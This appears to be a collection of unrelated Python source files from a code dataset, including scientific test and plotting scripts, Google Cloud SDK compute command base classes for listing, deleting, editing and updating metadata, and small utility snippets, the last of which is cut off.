def test_make_veg_var_5snowband():
    """make_veg_var(4) with five snow bands configured."""
    vic_lib.options.SNOW_BAND = 5
    assert vic_lib.make_veg_var(4) is not None
def test_make_veg_var_5snowbands_carbon_is_true():
    """make_veg_var(4) with five snow bands and the carbon model enabled."""
    vic_lib.options.SNOW_BAND = 5
    vic_lib.options.CARBON = True
    assert vic_lib.make_veg_var(4) is not None
| StarcoderdataPython |
6577774 | <filename>funciones_gamma.py<gh_stars>0
from matplotlib import pyplot as plt
import numpy as np
def g_gamma(x, z):
    """Integrand of the Gamma function: x**(z-1) * exp(-x).

    Integrating this over x from 0 to infinity yields Gamma(z).

    Params:
    :param z: the argument at which Gamma(z) is evaluated
    :param x: the integration variable (scalar or numpy array)
    """
    power_term = np.power(x, z - 1)
    decay_term = np.exp(-x)
    return power_term * decay_term
def g(u, z):
    """Integrand for Gamma(z) after the substitution u = 1/(x+1).

    The original integral over x in [0, inf) becomes an integral of this
    function over u in (0, 1].

    Params:
    :param z: the argument at which Gamma(z) is evaluated
    :param u: the integration variable (scalar or numpy array)
    """
    x = 1 / u - 1  # invert the change of variables
    jacobian = 1 / (u ** 2)  # |dx/du|
    return x ** (z - 1) * np.exp(-x) * jacobian
# Plot both Gamma integrands for z = k/2.
k = 4.551
z = k/2
# Sample grids: x for the infinite-range integrand, u for the substituted one.
x = np.linspace(0, 70, num=200)
u = np.linspace(0, 1, num=200)
# figures:
# NOTE(review): u includes 0, so g(u, z) divides by zero at the first
# sample (numpy emits a warning and an inf) -- confirm this is acceptable.
plt.clf()
plt.figure(1)
plt.plot(x, g_gamma(x,z))
plt.xlabel('x', fontsize=16)
plt.ylabel('$g_{\Gamma}(x,z)$', fontsize=16)
plt.figure(2)
plt.plot(u, g(u,z))
plt.xlabel('u', fontsize=16)
plt.ylabel('$g(u,z)$', fontsize=16)
plt.show()
11333946 | from gym_adserver.envs.adserver import Ad
from gym_adserver.envs.adserver import AdServerEnv | StarcoderdataPython |
4859813 | <gh_stars>0
# Copyright 2014 Google Inc. All Rights Reserved.
"""Base classes for abstracting away common logic."""
import abc
import collections
import copy
import cStringIO
import itertools
import json
import sys
import textwrap
import protorpc.messages
import yaml
from googlecloudapis.apitools.base.py import encoding
from googlecloudapis.compute.v1 import compute_v1_messages as messages
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.compute.lib import constants
from googlecloudsdk.compute.lib import lister
from googlecloudsdk.compute.lib import metadata_utils
from googlecloudsdk.compute.lib import property_selector
from googlecloudsdk.compute.lib import request_helper
from googlecloudsdk.compute.lib import resource_specs
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.util import console_io
from googlecloudsdk.core.util import edit
from googlecloudsdk.core.util import resource_printer
def ConstructList(title, items):
  """Returns a string displaying the items and a title.

  Duplicates are removed and the remaining items are sorted.
  """
  output_buffer = cStringIO.StringIO()
  unique_items = sorted(set(items))
  console_io.ListPrinter(title).Print(unique_items, output_stream=output_buffer)
  return output_buffer.getvalue()
def RaiseToolException(problems, error_message=None):
  """Raises a ToolException with the given list of messages.

  Args:
    problems: iterable of (http_code, message) pairs.
    error_message: optional title for the error list; a default is used
      when None.
  """
  errors = []
  tips = []
  for code, message in problems:
    errors.append(message)
    # Collect any troubleshooting tips registered for this HTTP code.
    tips.extend(constants.HTTP_ERROR_TIPS.get(code) or [])
  advice = ''
  if tips:
    advice = ConstructList(
        '\nhere are some tips that may help fix these problems:', tips)
  raise calliope_exceptions.ToolException(
      ConstructList(
          error_message or 'some requests did not succeed:',
          errors) + advice)
def PrintTable(resources, table_cols):
  """Prints a table of the given resources.

  Args:
    resources: iterable of resource dicts to display, one per row.
    table_cols: list of (column_name, action) pairs where action is either
      a property_selector.PropertyGetter or a callable taking the resource.
  """
  # TODO(user): Switch over to console_io.TablePrinter once the
  # class is refactored to support tables without ASCII borders.
  printer = resource_printer.TablePrinter(out=log.out)
  printer.AddRow([column_name for column_name, _ in table_cols])
  for item in resources:
    cells = []
    for _, extractor in table_cols:
      if isinstance(extractor, property_selector.PropertyGetter):
        cells.append(extractor.Get(item) or '')
      elif callable(extractor):
        cells.append(extractor(item))
    printer.AddRow(cells)
  printer.Print()
class BaseCommand(base.Command):
  """Base class for all compute subcommands."""
  __metaclass__ = abc.ABCMeta
  def __init__(self, *args, **kwargs):
    super(BaseCommand, self).__init__(*args, **kwargs)
    if self.print_resource_type:
      # Constructing the spec can be potentially expensive (e.g.,
      # generating the set of valid fields from the protobuf message),
      # so we fetch it once in the constructor.
      self._resource_spec = resource_specs.GetSpec(self.print_resource_type)
    else:
      self._resource_spec = None
  @property
  def transformations(self):
    """Property transformations used when rendering resources, or None."""
    if self._resource_spec:
      return self._resource_spec.transformations
    else:
      return None
  # TODO(user): Change this to "resource_type". "print_resource_type"
  # is now a misnomer because the resource_specs module contains
  # non-presentation data as well (e.g., which fields can be edited
  # for a give resource).
  @property
  def print_resource_type(self):
    """Specifies the name of the collection that should be printed."""
    return None
class BaseResourceFetcher(BaseCommand):
  """Base class for the get and list subcommands."""
  __metaclass__ = abc.ABCMeta
  @staticmethod
  def Args(parser, add_name_regex_arg=True):
    # Registers the flags shared by all fetching subcommands:
    # --raw-links, --limit, --sort-by and (optionally) name_regex.
    raw_links = parser.add_argument(
        '--raw-links',
        action='store_true',
        help=('If provided, resource references in output from the server will '
              'not be condensed for readability.'))
    raw_links.detailed_help = """\
        If provided, resource references in output from the server
        will not be condensed for readability. For example, when
        listing operations, if a targetLink is
        ``https://www.googleapis.com/compute/v1/projects/my-project/zones/us-central2-a/instances/my-instance'',
        ``us-central2-a/instances/my-instance'' is shown for
        brevity. This behavior can be turned off using this flag.
        """
    parser.add_argument(
        '--limit',
        type=int,
        help='The maximum number of results.')
    sort_by = parser.add_argument(
        '--sort-by',
        help='A field to sort by.')
    sort_by.detailed_help = """\
        A field to sort by. To perform a descending-order sort, prefix
        the value of this flag with a tilde (``~'').
        """
    if add_name_regex_arg:
      name_regex = parser.add_argument(
          'name_regex',
          nargs='*',
          default=[],
          help='Name regular expressions used to filter the resources fetched.')
      name_regex.detailed_help = """\
          Name regular expressions used to filter the resources
          fetched. The regular expressions must conform to the re2
          syntax (see
          link:https://code.google.com/p/re2/wiki/Syntax[]).
          """
  @abc.abstractmethod
  def ActuallyRun(self, args):
    """Method to be implemented by subclasses.
    This allows the Run() method of this class definition to do any
    work common to all subclasses such as flag validation.
    Args:
      args: A dictionary representing command-line arguments.
    """
  def Run(self, args):
    """Validates --limit, then delegates to ActuallyRun()."""
    if args.limit is not None:
      if args.limit <= 0:
        raise calliope_exceptions.ToolException(
            '--limit must be a positive integer; received: {0}'
            .format(args.limit))
      # A really large value should be treated as if the user does not
      # want to impose a limit.
      # NOTE(review): sys.maxint exists only on Python 2; this module
      # predates Python 3 (see the cStringIO import).
      if args.limit > sys.maxint:
        args.limit = None
    return self.ActuallyRun(args)
  @abc.abstractmethod
  def GetResources(self, args, errors):
    """Returns a generator of JSON-serializable resource dicts."""
class BaseLister(BaseResourceFetcher):
  """Base class for the list subcommands."""
  __metaclass__ = abc.ABCMeta
  @staticmethod
  def Args(parser):
    # Standard fetcher flags plus the lister-specific --uri flag.
    BaseResourceFetcher.Args(parser)
    uri = parser.add_argument(
        '--uri',
        action='store_true',
        help='If provided, a list of URIs is printed instead of a table.')
    uri.detailed_help = """\
        If provided, the list command will only print URIs for the
        resources returned. If this flag is not provided, the list
        command will print a human-readable table of useful resource
        data.
        """
  def ActuallyRun(self, args):
    """Yields JSON-serializable dicts of resources or self links."""
    if args.uri:
      # No field selection needed: only selfLink values are emitted.
      field_selector = None
    else:
      # The field selector should be constructed before any resources
      # are fetched, so if there are any syntactic errors with the
      # fields, we can fail fast.
      field_selector = property_selector.PropertySelector(
          properties=None,
          transformations=None if args.raw_links else self.transformations)
    errors = []
    resources = lister.ProcessResults(
        resources=self.GetResources(args, errors),
        field_selector=field_selector,
        sort_by=args.sort_by,
        limit=args.limit)
    for resource in resources:
      if args.uri:
        yield resource['selfLink']
      else:
        yield resource
    # Report any per-request failures accumulated while fetching.
    if errors:
      RaiseToolException(errors)
  def Display(self, args, resources):
    """Prints the given resources."""
    if args.uri:
      for resource in resources:
        log.out.Print(resource)
    else:
      PrintTable(resources, self._resource_spec.table_cols)
def AddFieldsFlag(parser, resource_type):
  """Adds the --fields flag to the given parser.

  This function is to be called from implementations of get
  subcommands. The resulting help text of --fields will contain all
  valid values for the flag. We need this function because Args() is a
  static method, so the only way to communicate the resource type is by
  having the subclass pass it in.

  Args:
    parser: The parser to add --fields to.
    resource_type: The resource type as defined in the resource_specs
      module.
  """
  fields = parser.add_argument(
      '--fields',
      nargs='+',
      help='Fields to display.')

  def _GenerateDetailedHelp():
    valid_fields = resource_specs.GetSpec(resource_type).fields
    return ('Fields to display. Possible values are:\n+\n ' +
            '\n '.join(valid_fields))

  # Assign the callable itself rather than its result: computing the set
  # of valid fields is expensive, so the detailed help text is only
  # generated when it is actually rendered.
  fields.detailed_help = _GenerateDetailedHelp
class BaseGetter(BaseResourceFetcher):
  """Base class for the get subcommands."""
  __metaclass__ = abc.ABCMeta
  @staticmethod
  def Args(parser, add_name_regex_arg=True):
    # Standard fetcher flags plus the getter-specific --format flag.
    BaseResourceFetcher.Args(parser, add_name_regex_arg=add_name_regex_arg)
    format_arg = parser.add_argument(
        '--format',
        choices=resource_printer.SUPPORTED_FORMATS,
        default='yaml',
        help='Specifies the display format.')
    format_arg.detailed_help = """\
        Specifies the display format. By default, resources are
        printed in YAML format. The "text" and "yaml" formats print
        data as they are fetched from the server, so these formats
        feel more responsive. The "json" format delays printing
        until all data is collected into a single list,
        so it may feel less responsive.
        """
  def ActuallyRun(self, args):
    """Yields JSON-serializable dicts of resources."""
    # NOTE(review): args.fields assumes AddFieldsFlag() was called when
    # the subclass registered its flags -- confirm for every subclass.
    # The field selector should be constructed before any resources
    # are fetched, so if there are any syntactic errors with the
    # fields, we can fail fast.
    field_selector = property_selector.PropertySelector(
        properties=args.fields,
        transformations=None if args.raw_links else self.transformations)
    errors = []
    resources = lister.ProcessResults(
        resources=self.GetResources(args, errors),
        field_selector=field_selector,
        sort_by=args.sort_by,
        limit=args.limit)
    for resource in resources:
      yield resource
    # Report any per-request failures accumulated while fetching.
    if errors:
      RaiseToolException(errors)
  def Display(self, args, resources):
    """Prints the given resources."""
    resource_printer.Print(
        resources=resources,
        print_format=args.format,
        out=log.out)
class GlobalResourceFetcherMixin(object):
  """Mixin class for global resources."""
  def GetResources(self, args, errors):
    """Fetches global resources; request failures are appended to errors."""
    return lister.GetGlobalResources(
        resource_service=self.service,
        project=properties.VALUES.core.project.Get(required=True),
        requested_name_regexes=args.name_regex,
        http=self.context['http'],
        batch_url=self.context['batch-url'],
        errors=errors)
class GlobalLister(GlobalResourceFetcherMixin, BaseLister):
  """Base class for listing global resources (table or URI output)."""
class GlobalGetter(GlobalResourceFetcherMixin, BaseGetter):
  """Base class for getting global resources (full resource output)."""
class RegionalResourceFetcherMixin(object):
  """Mixin class for regional resources."""
  def GetResources(self, args, errors):
    """Fetches regional resources; request failures are appended to errors."""
    compute = self.context['compute']
    return lister.GetRegionalResources(
        regions_service=compute.regions,
        resource_service=self.service,
        project=properties.VALUES.core.project.Get(required=True),
        requested_regions=args.regions,
        requested_name_regexes=args.name_regex,
        http=self.context['http'],
        batch_url=self.context['batch-url'],
        errors=errors)
class RegionalLister(RegionalResourceFetcherMixin, BaseLister):
  """Base class for listing regional resources."""
  @staticmethod
  def Args(parser):
    # Adds --regions on top of the standard lister flags.
    BaseLister.Args(parser)
    parser.add_argument(
        '--regions',
        metavar='REGION',
        help='If provided, only resources from the given regions are queried.',
        nargs='+',
        default=[])
class RegionalGetter(RegionalResourceFetcherMixin, BaseGetter):
  """Base class for getting regional resources."""
  @staticmethod
  def Args(parser):
    # Adds --regions on top of the standard getter flags.
    BaseGetter.Args(parser)
    parser.add_argument(
        '--regions',
        metavar='REGION',
        help='If provided, only resources from the given regions are queried.',
        nargs='+',
        default=[])
class ZonalResourceFetcherMixin(object):
  """Mixin class for zonal resources."""
  def GetResources(self, args, errors):
    """Fetches zonal resources; request failures are appended to errors."""
    compute = self.context['compute']
    return lister.GetZonalResources(
        zones_service=compute.zones,
        resource_service=self.service,
        project=properties.VALUES.core.project.Get(required=True),
        requested_zones=args.zones,
        requested_name_regexes=args.name_regex,
        http=self.context['http'],
        batch_url=self.context['batch-url'],
        errors=errors)
class ZonalLister(ZonalResourceFetcherMixin, BaseLister):
  """Base class for listing zonal resources."""
  @staticmethod
  def Args(parser):
    # Adds --zones on top of the standard lister flags.
    BaseLister.Args(parser)
    parser.add_argument(
        '--zones',
        metavar='ZONE',
        help='If provided, only resources from the given zones are queried.',
        nargs='+',
        default=[])
class ZonalGetter(ZonalResourceFetcherMixin, BaseGetter):
  """Base class for getting zonal resources."""
  @staticmethod
  def Args(parser):
    # Adds --zones on top of the standard getter flags.
    BaseGetter.Args(parser)
    parser.add_argument(
        '--zones',
        metavar='ZONE',
        help='If provided, only resources from the given zones are queried.',
        nargs='+',
        default=[])
class BaseAsyncMutator(BaseCommand):
  """Base class for subcommands that mutate resources."""
  __metaclass__ = abc.ABCMeta
  @abc.abstractproperty
  def service(self):
    """The service that can mutate resources."""
  @property
  def custom_get_requests(self):
    """Returns request objects for getting the mutated resources.
    This should be a dict mapping operation targetLink names to
    requests that can be passed to batch_helper. This is useful for
    verbs whose operations do not point to the resources being mutated
    (e.g., Disks.createSnapshot).
    If None, the operations' targetLinks are used to fetch the mutated
    resources.
    """
    return None
  @abc.abstractproperty
  def method(self):
    """The method name on the service as a string."""
  @abc.abstractmethod
  def CreateRequests(self, args):
    """Creates the requests that perform the mutation.
    It is okay for this method to make calls to the API as long as the
    calls originating from this method do not cause any mutations.
    Args:
      args: The command-line arguments.
    Returns:
      A list of request protobufs.
    """
  def Run(self, args):
    """Issues the mutation requests and yields the resulting resources."""
    request_protobufs = self.CreateRequests(args)
    # Each request is dispatched through (service, method, protobuf) tuples.
    requests = [
        (self.service, self.method, request) for request in request_protobufs]
    resources = request_helper.MakeRequests(
        requests=requests,
        http=self.context['http'],
        batch_url=self.context['batch-url'],
        custom_get_requests=self.custom_get_requests)
    resources = lister.ProcessResults(
        resources=resources,
        field_selector=property_selector.PropertySelector(
            properties=None,
            transformations=self.transformations))
    for resource in resources:
      yield resource
  def Display(self, _, resources):
    """Prints the given resources."""
    # The following try/except ensures that we only call
    # resource_printer.Print if there is as least one item in the
    # resources generator.
    try:
      head = next(resources)
      resources = itertools.chain([head], resources)
      resource_printer.Print(
          resources=resources,
          print_format='yaml',
          out=log.out)
    except StopIteration:
      pass
class BaseDeleter(BaseAsyncMutator):
  """Base class for deleting resources."""
  @staticmethod
  def Args(parser):
    BaseAsyncMutator.Args(parser)
    parser.add_argument(
        'names',
        metavar='NAME',
        nargs='+',
        help='The resources to delete.')
  @abc.abstractproperty
  def collection(self):
    """The name of the collection that we will delete from."""
  @property
  def method(self):
    """All deleters invoke the service's Delete method."""
    return 'Delete'
  def ScopeRequest(self, args, request):
    """Adds a zone or region to the request object if necessary."""
  def CreateRequests(self, args):
    """Returns a list of delete request protobufs."""
    delete_request_class = self.service.GetRequestType(self.method)
    # The resource-name field is the last ordered param of the Delete method.
    name_field = self.service.GetMethodConfig(self.method).ordered_params[-1]
    # NOTE(review): self.prompt_title is set by the subclasses' Run()
    # overrides before this method executes -- confirm for new subclasses.
    prompt_message = ConstructList(self.prompt_title, args.names)
    if not console_io.PromptContinue(message=prompt_message):
      raise calliope_exceptions.ToolException('deletion aborted by user')
    requests = []
    for name in args.names:
      request = delete_request_class(project=self.context['project'])
      setattr(request, name_field, name)
      self.ScopeRequest(args, request)
      requests.append(request)
    return requests
class ZonalDeleter(BaseDeleter):
  """Base class for deleting zonal resources."""
  @staticmethod
  def Args(parser):
    BaseDeleter.Args(parser)
    parser.add_argument(
        '--zone',
        help='The zone of the resources to delete.',
        required=True)
  def ScopeRequest(self, args, request):
    """Attach the target zone to the delete request."""
    request.zone = args.zone
  def Run(self, args):
    # Build the confirmation prompt title before delegating to BaseDeleter.
    self.prompt_title = (
        'The following {0} in zone {1} will be deleted:'.format(
            self.collection, args.zone))
    return super(ZonalDeleter, self).Run(args)
class RegionalDeleter(BaseDeleter):
  """Deleter for resources that live in a single region."""

  @staticmethod
  def Args(parser):
    BaseDeleter.Args(parser)
    parser.add_argument(
        '--region',
        required=True,
        help='The region of the resources to delete.')

  def ScopeRequest(self, args, request):
    # Regional delete requests must carry the region.
    request.region = args.region

  def Run(self, args):
    self.prompt_title = (
        'The following {0} in region {1} will be deleted:'
        .format(self.collection, args.region))
    return super(RegionalDeleter, self).Run(args)
class GlobalDeleter(BaseDeleter):
  """Deleter for resources with no zone or region scope."""

  def Run(self, args):
    self.prompt_title = (
        'The following {0} will be deleted:'.format(self.collection))
    return super(GlobalDeleter, self).Run(args)
class ReadWriteCommand(BaseCommand):
  """Base class for read->update->write subcommands.

  Subclasses fetch a resource (GetGetRequest), compute a replacement
  (Modify), and write it back (GetSetRequest) only when something
  actually changed.
  """

  __metaclass__ = abc.ABCMeta

  @abc.abstractproperty
  def service(self):
    pass

  @abc.abstractmethod
  def GetGetRequest(self, args):
    """Returns a request for fetching the resource."""

  @abc.abstractmethod
  def GetSetRequest(self, args, replacement, existing):
    """Returns a request for setting the resource."""

  @abc.abstractmethod
  def Modify(self, args, existing):
    """Returns a modified resource."""

  @property
  def messages(self):
    # Proto message module for subclasses building requests.
    return messages

  def Run(self, args):
    # Fetch the current state of the resource.
    get_request = self.GetGetRequest(args)
    objects = list(request_helper.MakeRequests(
        requests=[get_request],
        http=self.context['http'],
        batch_url=self.context['batch-url']))

    new_object = self.Modify(args, objects[0])

    # If existing object is equal to the proposed object or if
    # Modify() returns None, then there is no work to be done, so we
    # print the resource and return.
    if not new_object or objects[0] == new_object:
      for resource in lister.ProcessResults(
          resources=[objects[0]],
          field_selector=property_selector.PropertySelector(
              properties=None,
              transformations=self.transformations)):
        yield resource
      return

    # Write the modified resource back.
    resources = request_helper.MakeRequests(
        requests=[self.GetSetRequest(args, new_object, objects[0])],
        http=self.context['http'],
        batch_url=self.context['batch-url'])

    resources = lister.ProcessResults(
        resources=resources,
        field_selector=property_selector.PropertySelector(
            properties=None,
            transformations=self.transformations))
    for resource in resources:
      yield resource

  def Display(self, _, resources):
    # Run() is a generator, so resources arrive lazily here.
    resource_printer.Print(
        resources=resources,
        print_format='yaml',
        out=log.out)
class ReadSetCommand(BaseCommand):
  """Base class for read->set subcommands.

  Unlike ReadWriteCommand there is no Modify step: the set request is
  derived directly from the fetched resource and is always issued.
  """

  __metaclass__ = abc.ABCMeta

  @abc.abstractproperty
  def service(self):
    pass

  @abc.abstractmethod
  def GetGetRequest(self, args):
    """Returns a request for fetching a resource."""

  @abc.abstractmethod
  def GetSetRequest(self, args, existing):
    """Returns a request for setting a resource."""

  def Run(self, args):
    # Fetch the current resource.
    get_request = self.GetGetRequest(args)
    objects = list(request_helper.MakeRequests(
        requests=[get_request],
        http=self.context['http'],
        batch_url=self.context['batch-url']))

    # Unconditionally issue the set request built from it.
    set_request = self.GetSetRequest(args, objects[0])
    resources = request_helper.MakeRequests(
        requests=[set_request],
        http=self.context['http'],
        batch_url=self.context['batch-url'])

    resources = lister.ProcessResults(
        resources=resources,
        field_selector=property_selector.PropertySelector(
            properties=None,
            transformations=self.transformations))
    for resource in resources:
      yield resource

  def Display(self, _, resources):
    resource_printer.Print(
        resources=resources,
        print_format='yaml',
        out=log.out)
class BaseMetadataAdder(ReadWriteCommand):
  """Base class for adding or modifying metadata entries."""

  @staticmethod
  def Args(parser):
    metadata_utils.AddMetadataArgs(parser)

  def Modify(self, args, existing):
    """Merges the requested metadata into a copy of the resource.

    Returns None when the merge is a no-op, which tells
    ReadWriteCommand.Run to skip the write.
    """
    new_object = copy.deepcopy(existing)
    existing_metadata = getattr(existing, self.metadata_field, None)
    setattr(
        new_object,
        self.metadata_field,
        metadata_utils.ConstructMetadataMessage(
            metadata=args.metadata,
            metadata_from_file=args.metadata_from_file,
            existing_metadata=existing_metadata))

    if metadata_utils.MetadataEqual(
        existing_metadata,
        getattr(new_object, self.metadata_field, None)):
      return None
    else:
      return new_object

  def Run(self, args):
    # Validate up front so we fail before issuing any API call.
    if not args.metadata and not args.metadata_from_file:
      raise calliope_exceptions.ToolException(
          'at least one of --metadata or --metadata-from-file must be provided')

    return super(BaseMetadataAdder, self).Run(args)
class BaseMetadataRemover(ReadWriteCommand):
  """Base class for removing metadata entries."""

  @staticmethod
  def Args(parser):
    # --all and --keys are mutually exclusive ways to select entries.
    group = parser.add_mutually_exclusive_group()
    group.add_argument(
        '--all',
        action='store_true',
        default=False,
        help='If provided, all metadata entries are removed.')
    group.add_argument(
        '--keys',
        help='The keys of the entries to remove.',
        metavar='KEY',
        nargs='+')

  def Modify(self, args, existing):
    """Returns a copy of the resource with the selected entries removed,
    or None if nothing changed (ReadWriteCommand then skips the write)."""
    new_object = copy.deepcopy(existing)
    existing_metadata = getattr(existing, self.metadata_field, None)
    setattr(new_object,
            self.metadata_field,
            metadata_utils.RemoveEntries(
                existing_metadata=existing_metadata,
                keys=args.keys,
                remove_all=args.all))

    if metadata_utils.MetadataEqual(
        existing_metadata,
        getattr(new_object, self.metadata_field, None)):
      return None
    else:
      return new_object

  def Run(self, args):
    # Validate before any API traffic.
    if not args.all and not args.keys:
      raise calliope_exceptions.ToolException(
          'one of --all or --keys must be provided')

    return super(BaseMetadataRemover, self).Run(args)
class InstanceMetadataMutatorMixin(ReadWriteCommand):
  """Mixin for mutating instance metadata."""

  @staticmethod
  def Args(parser):
    parser.add_argument(
        '--zone',
        help='The zone of the instance.',
        required=True)
    parser.add_argument(
        'name',
        metavar='NAME',
        help='The name of the instance whose metadata should be modified.')

  @property
  def service(self):
    return self.context['compute'].instances

  @property
  def metadata_field(self):
    # Instances keep their metadata on the 'metadata' field.
    return 'metadata'

  def GetGetRequest(self, args):
    return (self.service,
            'Get',
            messages.ComputeInstancesGetRequest(
                instance=args.name,
                project=self.context['project'],
                zone=args.zone))

  def GetSetRequest(self, args, replacement, existing):
    return (self.service,
            'SetMetadata',
            messages.ComputeInstancesSetMetadataRequest(
                instance=args.name,
                metadata=replacement.metadata,
                project=self.context['project'],
                zone=args.zone))
class InstanceTagsMutatorMixin(ReadWriteCommand):
  """Mixin for mutating instance tags."""

  @staticmethod
  def Args(parser):
    parser.add_argument(
        '--zone',
        help='The zone of the instance.',
        required=True)
    parser.add_argument(
        'name',
        metavar='NAME',
        help='The name of the instance whose tags should be modified.')

  @property
  def service(self):
    return self.context['compute'].instances

  def GetGetRequest(self, args):
    return (self.service,
            'Get',
            messages.ComputeInstancesGetRequest(
                instance=args.name,
                project=self.context['project'],
                zone=args.zone))

  def GetSetRequest(self, args, replacement, existing):
    # The replacement's tags message is sent wholesale via SetTags.
    return (self.service,
            'SetTags',
            messages.ComputeInstancesSetTagsRequest(
                instance=args.name,
                tags=replacement.tags,
                project=self.context['project'],
                zone=args.zone))
class ProjectMetadataMutatorMixin(ReadWriteCommand):
  """Mixin for mutating project-level metadata."""

  @property
  def service(self):
    return self.context['compute'].projects

  @property
  def metadata_field(self):
    # Project-wide metadata lives on 'commonInstanceMetadata'.
    return 'commonInstanceMetadata'

  def GetGetRequest(self, args):
    return (self.service,
            'Get',
            messages.ComputeProjectsGetRequest(
                project=self.context['project']))

  def GetSetRequest(self, args, replacement, existing):
    return (self.service,
            'SetCommonInstanceMetadata',
            messages.ComputeProjectsSetCommonInstanceMetadataRequest(
                metadata=replacement.commonInstanceMetadata,
                project=self.context['project']))
# Preamble written (as comment lines) at the top of the temporary file
# the user edits with $EDITOR; see BaseEdit.Run.
_HELP = textwrap.dedent("""\
You can edit the resource below. Lines beginning with "#" are
ignored.
If you introduce a syntactic error, you will be given the
opportunity to edit the file again. You can abort by closing this
file without saving it.
At the bottom of this file, you will find an example resource.
Only fields that can be modified are shown. The original resource
with all of its fields is reproduced in the comment section at the
bottom of this document.
""")
def _SerializeDict(value, fmt):
"""Serializes value to either JSON or YAML."""
if fmt == 'json':
return json.dumps(
value,
indent=2,
sort_keys=True,
separators=(',', ': '))
else:
yaml.add_representer(
collections.OrderedDict,
yaml.dumper.SafeRepresenter.represent_dict,
Dumper=yaml.dumper.SafeDumper)
return yaml.safe_dump(
value,
indent=2,
default_flow_style=False,
width=70)
def _DeserializeValue(value, fmt):
"""Parses the given JSON or YAML value."""
if fmt == 'json':
return json.loads(value)
else:
return yaml.load(value)
def _WriteResourceInCommentBlock(serialized_resource, title, buf):
"""Outputs a comment block with the given serialized resource."""
buf.write('# ')
buf.write(title)
buf.write('\n# ')
buf.write('-' * len(title))
buf.write('\n#\n')
for line in serialized_resource.splitlines():
buf.write('#')
if line:
buf.write(' ')
buf.write(line)
buf.write('\n')
class BaseEdit(BaseCommand):
  """Base class for modifying resources using $EDITOR.

  Flow: fetch the resource, serialize its editable fields into a
  commented help buffer, hand the buffer to the user's editor, then
  parse and apply the edits, re-prompting on parse/apply failures.
  """

  __metaclass__ = abc.ABCMeta

  @abc.abstractproperty
  def service(self):
    pass

  @abc.abstractmethod
  def GetGetRequest(self, args):
    """Returns a request for fetching the resource."""

  @abc.abstractmethod
  def GetSetRequest(self, args, replacement, existing):
    """Returns a request for setting the resource."""

  @abc.abstractproperty
  def example_resource(self):
    pass

  @staticmethod
  def Args(parser):
    format_arg = parser.add_argument(
        '--format',
        choices=['json', 'yaml'],
        default='yaml',
        help='The format to edit the resource in.')
    format_arg.detailed_help = """\
The format to edit the resource in. Choices are ``json'' and ``yaml''.
"""

  def ProcessEditedResource(self, file_contents, args):
    """Returns an updated resource that was edited by the user."""

    # It's very important that we replace the characters of comment
    # lines with spaces instead of removing the comment lines
    # entirely. JSON and YAML deserialization give error messages
    # containing line, column, and the character offset of where the
    # error occurred. If the deserialization fails, we want to make
    # sure those numbers map back to what the user actually had in
    # front of him or her otherwise the errors will not be very
    # useful.
    non_comment_lines = '\n'.join(
        ' ' * len(line) if line.startswith('#') else line
        for line in file_contents.splitlines())

    modified_record = _DeserializeValue(non_comment_lines, args.format)

    if self.modifiable_record == modified_record:
      new_object = None
    else:
      # 'name' is not user-editable; restore it from the original, and
      # carry the fingerprint forward if the API uses one for
      # optimistic concurrency control.
      modified_record['name'] = self.original_record['name']
      fingerprint = self.original_record.get('fingerprint')
      if fingerprint:
        modified_record['fingerprint'] = fingerprint

      new_object = encoding.DictToMessage(
          modified_record, self._resource_spec.message_class)

    # If existing object is equal to the proposed object or if
    # there is no new object, then there is no work to be done, so we
    # return the original object.
    if not new_object or self.original_object == new_object:
      return [self.original_object]

    resources = list(request_helper.MakeRequests(
        requests=[self.GetSetRequest(args, new_object, self.original_object)],
        http=self.context['http'],
        batch_url=self.context['batch-url']))
    return resources

  def Run(self, args):
    get_request = self.GetGetRequest(args)
    objects = list(request_helper.MakeRequests(
        requests=[get_request],
        http=self.context['http'],
        batch_url=self.context['batch-url']))

    self.original_object = objects[0]
    self.original_record = encoding.MessageToDict(self.original_object)

    # Selects only the fields that can be modified.
    field_selector = property_selector.PropertySelector(
        properties=self._resource_spec.editables)
    self.modifiable_record = field_selector.Apply(self.original_record)

    # Build the editor buffer: commented help text, the editable record,
    # then the example and the full original as comment blocks.
    # NOTE(review): cStringIO is Python 2 only — confirm this module is
    # not expected to run on Python 3 (io.StringIO would be needed).
    buf = cStringIO.StringIO()
    for line in _HELP.splitlines():
      buf.write('#')
      if line:
        buf.write(' ')
      buf.write(line)
      buf.write('\n')

    buf.write('\n')
    buf.write(_SerializeDict(self.modifiable_record, args.format))
    buf.write('\n')

    example = _SerializeDict(
        encoding.MessageToDict(self.example_resource),
        args.format)
    _WriteResourceInCommentBlock(example, 'Example resource:', buf)

    buf.write('#\n')

    original = _SerializeDict(self.original_record, args.format)
    _WriteResourceInCommentBlock(original, 'Original resource:', buf)

    file_contents = buf.getvalue()
    # Edit/parse/apply loop: keep re-opening the editor until the edits
    # apply cleanly or the user declines to continue.
    while True:
      file_contents = edit.OnlineEdit(file_contents)
      try:
        resources = self.ProcessEditedResource(file_contents, args)
        break
      except (ValueError, yaml.error.YAMLError,
              protorpc.messages.ValidationError,
              calliope_exceptions.ToolException) as e:
        # NOTE(review): e.message is Python 2 only; str(e) covers both.
        if isinstance(e, ValueError):
          message = e.message
        else:
          message = str(e)
        if isinstance(e, calliope_exceptions.ToolException):
          problem_type = 'applying'
        else:
          problem_type = 'parsing'
        message = ('There was a problem {0} your changes: {1}'
                   .format(problem_type, message))
        if not console_io.PromptContinue(
            message=message,
            prompt_string='Would you like to edit the resource again?'):
          raise calliope_exceptions.ToolException('edit aborted by user')

    resources = lister.ProcessResults(
        resources=resources,
        field_selector=property_selector.PropertySelector(
            properties=None,
            transformations=self.transformations))
    for resource in resources:
      yield resource

  def Display(self, _, resources):
    resource_printer.Print(
        resources=resources,
        print_format='yaml',
        out=log.out)
| StarcoderdataPython |
4993239 | <gh_stars>0
from itertools import zip_longest

# Element-wise sum of two integer lists of different lengths;
# zip_longest pads the shorter list with 0 so no elements are lost.
lista_a = [1, 2, 3, 4, 5, 6, 7]
lista_b = [1, 2, 3, 4]

lista_soma = [
    primeiro + segundo
    for primeiro, segundo in zip_longest(lista_a, lista_b, fillvalue=0)
]
print(lista_soma)
9763974 | from ltk.actions.action import *
class CloneAction(Action):
    """Clones the subfolder structure of tracked folders into per-locale
    destination folders (ltk 'clone' command)."""

    def __init__(self, path):
        Action.__init__(self, path)

    def clone_folders(self, dest_path, folders_map, locale, copy_root=False):
